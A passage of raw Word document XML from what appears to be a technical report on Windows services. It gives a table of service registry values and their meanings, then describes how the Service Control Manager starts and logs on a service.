        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00944C64" w:rsidRDefault="00944C64" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00944C64">
              <w:t>Describes the service. The description is simply a comment that explains the purpose of the service.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>DiagnosticsMessageFile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00944C64" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00944C64">
              <w:t xml:space="preserve">Contains the name of the resource DLL that contains the event description strings for those events that the service writes into the application event log. Resource DLLs </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00944C64">
              <w:t>are located in</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00944C64">
              <w:t xml:space="preserve"> the \Program Files\Exchsrvr\Res directory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>DisplayName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00944C64" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00944C64">
              <w:t>Contains the display name that is used to identify the service. This string has a maximum length of 256 characters. The name is case-preserved in SCM. Display name comparisons are always case-insensitive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>ErrorControl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_DWORD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00944C64" w:rsidRDefault="00944C64" w:rsidP="00944C64">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Specifies error severity and the action taken if this service fails to start. This parameter determines one of the following:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00944C64" w:rsidRDefault="00944C64" w:rsidP="00247427">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>The startup program logs the error but continues the startup operation.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00944C64" w:rsidRDefault="00944C64" w:rsidP="00247427">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>The startup program logs the error and displays a message but continues the startup operation.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00944C64" w:rsidRDefault="00944C64" w:rsidP="00247427">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The startup program logs the error. If the "last known good" configuration is started, the startup operation continues. Otherwise, the system is restarted with the </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>"last known good" configuration.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00135336" w:rsidRDefault="00944C64" w:rsidP="00247427">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>The startup program logs the error, if possible. If the "last known good" configuration is started, the system startup is cancelled. Otherwise, the system is restarted with the "last known good" configuration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:lastRenderedPageBreak/>
              <w:t>FailureActions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_BINARY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00247427" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00247427">
              <w:t>Cites the action SCM should take for each failure of a service. A service is considered failed when it stops without reporting a status to the service controller (for example, when a service fails).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00247427" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00247427">
              <w:t>Names the load-ordering group of which this service is a member. Note that setting this value can override the setting of the DependOnService value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>ImagePath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_EXPAND_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00247427" w:rsidRDefault="00247427" w:rsidP="00247427">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Contains the fully qualified path to the service binary file. If the path contains a space, it must be quoted, so that it is correctly interpreted. For example, "d:\\Program Files\\Exchsvr\\Bin\\mad.exe".</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00135336" w:rsidRDefault="00247427" w:rsidP="00247427">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>The path can also include program arguments.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>ObjectName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00247427" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00247427">
              <w:t xml:space="preserve">Specifies the name of the account under which the service should run. If the service uses the LocalService account, this parameter is set to NT AUTHORITY\LocalService. It is also possible to specify an </w:t>
            </w:r>
            <w:r w:rsidRPr="00247427">
              <w:lastRenderedPageBreak/>
              <w:t>account name in the form DomainName\UserName.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:lastRenderedPageBreak/>
              <w:t>Start</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Specifies when to start the service. SCM can start a service automatically during system startup, or when a process requests the service start. This value can also specify that a service cannot be started and that attempts to start the service should result in the error code ERROR_SERVICE_DISABLED.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>Tag</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Determines the service startup order within a load-ordering group. Tags are only evaluated for driver services.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>Type</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Specifies the service type as file system driver, device driver, a service that runs its own process, or a service that shares a process with one or more other services. MSExchangeSA is an example of a service that runs its own process. EXIFS is an example of an Exchange-specific file system driver.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AF58DA" w:rsidRDefault="00AF58DA" w:rsidP="00AF58DA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00135336" w:rsidRPr="00C44A6F" w:rsidRDefault="00135336" w:rsidP="00C44A6F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc485303802"/>
      <w:r w:rsidRPr="00C44A6F">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6</w:t>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Service </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> values and description</w:t>
      </w:r>
      <w:r w:rsidR="00C44A6F" w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w:rsidR="00135336" w:rsidRPr="00C44A6F" w:rsidRDefault="00C44A6F" w:rsidP="00C44A6F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>From:</w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidR="00135336" w:rsidRPr="00C44A6F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://technet.microsoft.com/en-us/library/881d8b23-d274-4313-a666-88f80c2cfd92.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006A6051" w:rsidRPr="006A6051" w:rsidRDefault="006A6051" w:rsidP="006A6051">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6051">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Service Control Manager manages </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6051">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00135336" w:rsidRDefault="00131B99" w:rsidP="00135336">
      <w:r>
        <w:t xml:space="preserve">Enumerating services by reads each </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key at one from the services database, SCM can create a record for each service. A service record is a set of a service name, startup type, the service status (the current state, acceptable control codes, …) and a pointer to the dependency list of that service. </w:t>
      </w:r>
      <w:r w:rsidR="002F6C96">
        <w:t>SCM uses these records to determine which actions are valid for the services, according to their current status</w:t>
      </w:r>
      <w:r w:rsidR="00790F27">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="002F6C96">
        <w:t xml:space="preserve"> and dependencies. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00063F47" w:rsidRDefault="00063F47" w:rsidP="00135336">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">To start or stop a service, SCM communicate with the service it controls via a RPC. </w:t>
      </w:r>
      <w:r w:rsidR="00790F27">
        <w:t>SCM can start services automatically at system boot, or the service can be started manually by any service control program. However, if an</w:t>
      </w:r>
      <w:r w:rsidR="001B297E">
        <w:t xml:space="preserve"> auto-start service demand on a</w:t>
      </w:r>
      <w:r w:rsidR="00790F27">
        <w:t xml:space="preserve"> demand-start service, that demand-service is also started automatically. </w:t>
      </w:r>
      <w:r w:rsidR="001B297E">
        <w:t xml:space="preserve">The startup type can be set to “disable”, which tells SCM not to start the service at startup, the service also cannot be started by any mean as well. The dependencies between services are important that we should </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001B297E">
        <w:t>take a look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001B297E">
        <w:t xml:space="preserve"> at them before enabling or disabling a service. Neither an auto-start service nor a demand-start can be started if the servi</w:t>
      </w:r>
      <w:r w:rsidR="00C93DB6">
        <w:t xml:space="preserve">ce they depend on is disabled. Some services must not be disabled, otherwise, </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00C93DB6">
        <w:t xml:space="preserve"> will be fail</w:t>
      </w:r>
      <w:r w:rsidR="001541BB">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00C93DB6">
        <w:t xml:space="preserve"> to boot because the disabled service may be an essential service or a service that essential ones depend on. </w:t>
      </w:r>
      <w:r w:rsidR="0006024B">
        <w:t>When starting a service, SCM performs the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0006024B" w:rsidRPr="002B7458" w:rsidRDefault="002B7458" w:rsidP="0006024B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7458">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retrieves the account information stored in the services database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B7458" w:rsidRDefault="002B7458" w:rsidP="002B7458">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>The user</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7458">
        <w:t xml:space="preserve">name and password of the service account are specified at the time the service is installed. SCM stores the user name in a REG_SZ </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7458">
        <w:t xml:space="preserve"> value named </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7458">
        <w:t>ObjectName</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7458">
        <w:t xml:space="preserve"> within the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7458">
        <w:t xml:space="preserve"> key of the individual service (HKEY_LOCAL_MACHINE\SYSTEM\Curr</w:t>
      </w:r>
      <w:r>
        <w:t>entControlSet\Services\&lt;service</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7458">
        <w:t>name&gt;). The password is in a secure portion of Local Security Authority (LSA)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C2E70" w:rsidRDefault="001C2E70" w:rsidP="002B7458">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B7458" w:rsidRDefault="002B7458" w:rsidP="0006024B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7458">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Logs on the service account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C2E70" w:rsidRDefault="001C2E70" w:rsidP="001C2E70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Any process that runs in </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> be run under an authorization of a specific account. For starting a service, SCM query the account information of that service from the services databases and logs on to </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t>. The account that SCM uses to log on a local computer must have the user right called “Log on as a service”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C2E70" w:rsidRDefault="001C2E70" w:rsidP="001C2E70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001C2E70" w:rsidRDefault="001C2E70" w:rsidP="0006024B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Creates the service in suspended state</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C2E70" w:rsidRDefault="00AF24DE" w:rsidP="001C2E70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF24DE">
        <w:t>SCM starts new services in a suspended state, because the service is useful only after SCM adds the required security information to the new process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF24DE" w:rsidRPr="001C2E70" w:rsidRDefault="00AF24DE" w:rsidP="001C2E70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001C2E70" w:rsidRDefault="001C2E70" w:rsidP="0006024B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Assigns the access token to the process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF24DE" w:rsidRPr="00AF24DE" w:rsidRDefault="00AF24DE" w:rsidP="00AF24DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When an account logs on to </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t>, the operation system calls winlogon.exe for getting the username and password of that account. When the log process successful, winlogon.exe calls wininit.exe to generate an access token, and any process which runs under that account need that access token to verify themselves</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:id w:val="-762759373"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION Mic03 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00C111F5">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:t>(10)</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF24DE" w:rsidRDefault="00AF24DE" w:rsidP="00AF24DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B7458" w:rsidRDefault="001C2E70" w:rsidP="00407D41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Allow the process to ex</w:t>
      </w:r>
      <w:r w:rsidR="00AF24DE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6B58" w:rsidRDefault="00AF24DE" w:rsidP="00AF24DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>After SCM completes the logon procedure and assigns the access token, SCM can allow the service to run and perform its functions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007644D7" w:rsidRDefault="001B6B58" w:rsidP="007644D7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="007644D7" w:rsidRPr="007644D7">
        <w:lastRenderedPageBreak/>
        <w:t>When a service is running, it sends status notifications to the SCM process. SCM maintains this status information in the service record for each service.</w:t>
      </w:r>
      <w:r w:rsidR="007644D7">
